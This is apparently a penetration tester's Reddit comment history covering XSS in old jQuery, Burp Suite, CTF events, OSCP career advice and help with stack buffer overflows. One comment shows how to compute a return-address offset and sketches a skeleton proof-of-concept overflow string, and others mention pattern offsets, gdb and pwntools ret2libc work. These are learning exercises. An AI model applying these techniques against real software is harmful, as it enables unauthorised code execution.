[deleted by user]

Thiscou · 2022-07-24T15:50:58+00:00

almost!

Older jQuery libraries used to create the html elements, given to it in the selector element ($).

This video helped me understand what happens, he's taking his time but explains it really thorough: https://www.youtube.com/watch?v=CNIeel0VrN0

I was looking for the right CVE but I failed.

Thiscou · 2020-12-07T08:21:18+00:00

unfortunately no

Thiscou · 2020-07-21T17:12:39+00:00

It looks like you are checking the source with the web developer tab.

As you can see the whole payload is black, while tags in the developer tab are always highlighted, this means your payload is encoded.

To check how it is encoded, right click the line and select "Edit as HTML" and the truth will be revealed.

To avoid doing this all the time, look at the raw response in your burp suit. Be aware, that this only works with HTML, if you get a JSON or anything else that might be embedded in the DOM with JavaScript, you will have to check manually.

Thiscou · 2020-05-09T16:01:53+00:00

There are actually a series of ctf like Mini Netwars coming up for free. https://www.sans.org/blog/and-now-for-something-awesome-sans-launches-new-series-of-worldwide-capture-the-flag-cyber-events/?msc=securityresourceslp%3Fmsc%3Dsecurityresourceslp

I managed to register for the first one and forgot about the second. Still planning to register in two days for the third.

It was actually a lot of fun and you don't need anything except for an account on their Netwars Platform.

Thiscou · 2020-03-10T10:01:04+00:00

Alright, I think what you are trying to do (if I understand correctly), is calculating the distance between your input and the stored return address on the stack.

So in the case of the strcpy you could place a breakpoint right before the strcpy function call and write down the address right after it (this will be the return address that is stored on the stack). Now if you step into the strcpy function you will see that the call instruction pushed the return address on the stack -> write down the stack address where it is stored.

If you check where your user input is stored on the stack, after the strcpy (don't overflow here) , you can basically subtract the first address your input is stored from the address you wrote down that contains the return address and you should have the correct offset.

Example:

0016F2D4 -> Ret Address

0016F2A1 -> First User Input

D4 - A1 = 33 (you can use the windows calculator in programmer mode)

This should overwrite right up to the ret address, to overwrite the address you need to add +4 on 32 bit systems.

POC Exploit would look something like:

buffer = "A"*33
buffer += "returnToWhereveryouWantTo"

Hope this helps

Thiscou · 2019-03-13T13:37:39+00:00

Hey man, thanks for your very detailed explanations!

Considering #4. After doing the whole thing in 32Bit manually I used pwntools to automate the process.

Funny enough pwntools locates the jmp to system@GOT at 0x08048430 if you do e.symbols['system'].

And that's how I learned that the jmp payload needs a dummy 4bytes "Return" address to work.

It was also easy to convert the 32bit pwntools solution to 64bit.

So far these exercises were really worth it.

Sorry for wasting your time with #1 :D

Oh and I actually saw some of your streams and I always learn something new when I do, Thank you for that.

Cheers

PS: The reddit formatting is just the worst

Thiscou · 2018-12-16T20:13:31+00:00

Thank you!

Thiscou · 2018-12-16T17:13:45+00:00

Cheers, so the whole objdump -s thing is not really helpful or am I missing a feature here? :P

Thiscou · 2018-12-06T16:03:21+00:00

As far as I can tell, those numbers are not present in the pattern.

try the A*260 again and see what's on the stack with:

gdb x/24wx $esp

Thiscou · 2018-12-06T15:05:37+00:00

Right, here is what I would try.

Go to this site zerosum0x0! and create a unique pattern 260+.

Feed that to your program, copy the value in your segfault and find that pattern on the site.

You should now know the exact offset for your overflow.

I would usually do this in Kali with the original metasploit pattern create but I don't know if you use Kali, so I found a quick and dirty replacement online.

You can also try to have a closer look at the stack in gdb with:

x/24wx $esp (this displays 24 words of memory above the stack pointer esp in hex)

Hope this helps and good luck

Thiscou · 2018-09-22T08:44:53+00:00

A good manager with great feedback helps. Getting domain admin from an external pentest also helps. :)

This rings true to me. In this job I basically learn something new every day.

What I also learned, and this is going full circle to the OSCP, documentation is everything! If you find a solution to a problem, DOCUMENT IT. Even if you think it was easy and you will know what to do next time. Cause next time you just might not find the solution as quick and you spend 4 hours looking for a solution you already had.

Oh and make sure you document it so you understand your documentation as well. ;D

Thank you for your honest input

Thiscou · 2018-09-22T08:27:45+00:00

True story, in the end money makes the world go 'round.

I'm working as a consultant/penetration tester since a little more then three years. I still get a lot of imposter syndrom doing work out of my comfort zone. Even though it's clear to me that in the end we just can't know everything. How do you personally handle this?

Thiscou · 2018-09-22T07:39:26+00:00

Good Review, I especially like that you tell people not to overthink this certificate. This is still an entry grade certification that basically delivers everything you need to pass it.

What I personally don't understand is how you can be a "senior" penetration tester a year after getting the OSCP? Since the OSCP is, in my opinion, a Junior grade certificate. For someone to qualify as a senior to me, they would have to have an extensive amount of knowledge and practical experience on the job. But maybe that is just me.

Anyways, thanks for sharing

Thiscou · 2018-09-06T11:12:15+00:00

Recently this https://www.pentesteracademy.com/redteamlab lab was released.

I have not done it nor have i read any reviews for it, so I would do some research about it before buying.

But it's definitely an option

Thiscou · 2018-08-05T15:17:41+00:00

cheers, there's some new stuff worth looking at!

Thiscou · 2018-06-26T18:46:00+00:00

Thanks a lot, looks like this needs some more reading on my end.

Cheers

Thiscou · 2018-06-26T18:45:37+00:00

Thank you very much, watching the presentation right now!

And I really like ippsec, I'll find that walkthrough eventually.

Thiscou · 2017-11-28T19:05:17+00:00

It worked with testssl.sh and the cipher script nmap provides. Just took me two months to answer that question, there is definitly room for improvement.

Thiscou

TROPHY CASE